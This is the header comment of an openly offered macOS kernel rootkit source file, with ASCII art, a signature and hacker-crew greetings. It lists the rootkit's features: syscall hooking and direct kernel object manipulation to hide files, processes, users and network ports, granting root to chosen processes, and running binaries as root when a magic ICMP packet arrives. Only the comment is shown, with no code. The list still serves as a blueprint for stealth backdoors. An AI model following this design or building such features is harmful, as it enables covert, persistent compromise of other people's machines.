/*
.o8 o8o oooo
"888 `"' `888
oooo d8b oooo oooo 888oooo. oooo 888 oooo ooo ooo. .oo.
`888""8P `888 `888 d88' `88b `888 888 `88. .8' `888P"Y88b
888 888 888 888 888 888 888 `88..8' 888 888
888 888 888 888 888 888 888 `888' 888 888
d888b `V88V"V8P' `Y8bod8P' o888o o888o .8' o888o o888o
.o..P' HARDCORE EST. 1983
`Y8P'
64bit Mac OS-X kernel rootkit that uses no hardcoded address
to hook the BSD subsystem in all OS-X Lion & below. It uses a
combination of syscall hooking and DKOM to hide activity on a
host. String resolution of symbols no longer works on Mountain
Lion as symtab is destroyed during load, this code is portable
on all Lion & below but requires re-working for hooking under
Mountain Lion.
Features:
* works across multiple kernel versions (tested 11.0.0+)
* give root privileges to pid
* hide files / folders
* hide a process
* hide a user from 'who'/'w'
* hide a network port from netstat
* sysctl interface for userland control
* execute a binary with root privileges via magic ICMP ping
greetingz to #nullsecurity crew, snare, dino, nemo, thegrugq,
piotr & friendz!
-- prdelka
*/